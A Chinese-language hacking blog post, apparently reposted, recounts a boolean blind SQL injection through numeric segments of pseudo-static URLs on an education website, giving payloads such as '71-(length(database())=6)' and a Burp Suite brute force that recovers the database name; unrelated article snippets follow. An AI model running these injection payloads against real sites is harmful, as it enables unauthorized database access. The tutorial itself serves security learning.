干货!一次伪静态页面的SQL注入!白帽黑客实战

上官雨宝2022-07-20 08:35:00

干货!一次伪静态页面的SQL注入!白帽黑客实战 

涉及技能点

  • SQL注入基础原理
  • 盲注常用函数及思路
  • burpsuite基础知识

过程记录

1.发现

在翻阅一EDU站点时,发现路径中带有明显的数字参数

好像与我们平时习惯的xxx.php?id=不同呃

2.尝试注入

按照以往习惯,先用order by探探底,结果翻车了…应该有自定义逻辑在过滤敏感关键词。

继续努力,峰回路转,耶~~~!

构造boolen等式时能够被带入查询语句并显示不同效果

当条件不符合时,71-false=71,显示71.html,无数据

http://EDU_SITE/.../..._id/71-false.html
=> SELECT ..FROM .. WHERE ... AND _id=71-false

而当条件符合时,71-true=70,显示70.html,有数据

http://EDU_SITE/.../..._id/71-true.html
=> SELECT ..FROM .. WHERE ... AND _id=71-true

3.确定攻击方式,获取数据进行验证

获取用户名长度

http://EDU_SITE/.../..._id/71-(length(user())=12).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)

获取数据库长度

http://EDU_SITE/.../..._id/71-(length(database())=6).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)


尝试用burpsuite的clusterboom模式对database进行爆破

其中参数1 为位数,参数2 为可能出现的字符明文

获得最终database()=db_cms

总结


在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload

文章转自公众号:网络安全与黑客技术

sql注入白帽黑客
本作品采用《CC 协议》,转载必须注明作者和本文链接
涉及技能点 SQL注入基础原理 盲注常用函数及思路 burpsuite基础知识
当收到项目邀请时,白帽小哥注意到该目标在BugCrowd上已经两年多了,到目前为止已经发现了250+个漏洞,并支付了赏金奖励。GraphQL查询中的SQL注入:目标范围很大,但子域不在范围内。目标域类似target.*,因为它涵盖了广泛的 ccTLD。因此,在搜索子域或 ccTLD 域时,应确保使用组织名称进行搜索。的结果,经过过滤后,大约只有 64 个目标。
为了解决这个问题,世界上最大的网络设备供应商之一的Netgear推出了一个漏洞奖励计划,重点关注其产品,尤其是路由器、无线安全摄像头和网状Wi-Fi系统。如果您是漏洞赏金猎人,在攻击Netgear产品或网站之前,您应该阅读所有条款和条件。为所有Netgear客户提供支付卡数据访问的安全问题也将获得相同的支付。
1994年前后,国内出现最早一批黑客,其中以龚蔚、天山等顶级黑客为代表。
到2025年,欧盟将会安装超过100万个充电桩,以遏制温室气体排放。EVSE漏洞目前,业界已经有多个关于EV/EVSE连接窃取账户凭证或影响充电的网络攻击案例。爱达荷国家实验室 指出,EV 存在将病毒传播到 EVSE 的风险,EVSE 会进一步传播恶意软件。INL 评估后发现,EVSE 管理应用程序缺乏适当的身份验证
对于专业的渗透测试人员,人们通常称之为道德黑客白帽黑客或红队队员。渗透测试人员有时也背负骂名——因为花费时间采用大量勒索软件攻击很多企业。 渗透测试人员的工作是帮助企业加强网络安全防护以确保业务安全。渗透测试人员充当了勒索软件攻击者,根据他们的经验,企业应该提出以下五个问题:
反勒索软件指南手册PDF针对个人、企业、政府机关、各类机构的攻击层出不穷,在勒索病毒威胁面前,没有人能够置身事外。在勒索病毒处置中,如能及时正 确处置,可有效降低勒索病毒带来的损失,避免病毒影响进一步扩散。安全综合武器库一个面向渗透测试人员和安全研究人员安武器库,里面包含上百款安全神兵利器,能够适用于渗透测试的各种场景,并且能够推迟其亮出独门绝技并降低由此导致身份暴露的可能性。
科技巨头谷歌和微软都提高了安全研究人员、白帽黑客和发现其产品中存在严重缺陷的漏洞搜寻者的奖金。虽然微软刚刚将最高奖金从15000美元增加到30000美元,但谷歌将最高奖金从20000美元提高到31337美元,增幅为50%,外加1337美元奖金或“leet”奖。到目前为止,谷歌为远程代码执行缺陷提供2万美元,为不受限制的文件系统或数据库访问缺陷提供1万美元。
9月13日,工业和信息化部发布《网络产品安全漏洞收集平台备案管理办法(征求意见稿)》9月14日消息,中共中央办公厅、国务院办公厅近日印发了《关于加强网络文明建设的意见》(以下简称《意见》)
ChatGPT不会掀起黑客技术革命
上官雨宝
是水水水水是